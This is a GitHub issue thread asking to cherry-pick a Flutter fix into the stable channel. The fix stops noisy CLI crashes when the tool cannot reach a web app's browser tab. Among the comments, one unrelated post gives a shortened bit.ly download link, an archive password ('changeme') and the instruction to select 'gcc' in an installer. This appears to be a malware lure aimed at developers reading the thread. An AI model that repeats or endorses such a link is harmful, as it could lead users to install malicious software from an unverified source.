### ISSUE TITLE
[CP-stable] handle `IOException`s coming from `ChromeTab.connect` 

### ISSUE THREAD

**Issue by andrewkolos** [flutter/flutter#154192]
### Issue Link

https://github.com/flutter/flutter/issues/153972

### Target

stable

### Cherry pick PR Link

https://github.com/flutter/flutter/pull/154190

### Changelog Description

Prevents noisy CLI crashes resulting from the tool being unable to communicate with running Flutter web apps.

### Impacted Users

All Flutter Web devs

### Impact Description

Impacts development during `flutter run -d <browser>` workflows. Noisy crashes are generated in scenarios where the CLI tool cannot communicate to the browser (e.g. because the user closed the browser before the app finished bootstrapping).

### Workaround

Rerun the app, or don't manually interfere with the browser when the web app is starting (e.g. pausing JavaScript execution early).

### Risk

low

### Test Coverage

yes

### Validation Steps

Unknown due to the lack of a consistent repro.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by andrewkolos** [comment]
Closing since PR was rejected.
